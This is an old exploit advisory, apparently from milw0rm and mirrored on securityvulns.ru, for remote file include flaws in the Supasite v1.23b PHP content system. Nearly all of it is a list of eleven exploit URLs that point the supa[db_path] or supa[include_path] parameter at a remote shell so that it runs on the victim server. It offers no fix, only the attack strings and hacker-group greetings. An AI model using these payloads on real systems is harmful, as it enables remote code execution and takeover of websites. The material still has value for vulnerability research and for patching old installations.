Security Advisory: Supasite v1.23b <= Multiple Remote File Include Vulnerablitiy

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability
  Maran PHP Forum (forum_write.
php) Remote Code Execution Vulnerability
  JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability
  GPB bulletin board Remote file include

From: GolD_M <hacker__(at)_w.cn>
Date: 30.04.2007
Subject: Supasite v1.23b <= Multiple Remote File Include Vulnerablitiy

# Supasite v1.23b <= Multiple Remote File Include Vulnerablitiy
# D.Script: http://belnet.dl.sourceforge.net/sourceforge/supasite/supasite1.23b.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/supasite/common_functions.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_auth_cookies.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_mods.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_news.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_settings.php?supa[include_path]=Shell
# Exploit:[Path]/supasite/admin_topics.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_users.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_utilities.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/backend_site.php?supa[include_path]=Shell
# Exploit:[Path]/supasite/site_comment.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/site_news.php?supa[db_path]=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

# milw0rm.com [2007-04-21]

test server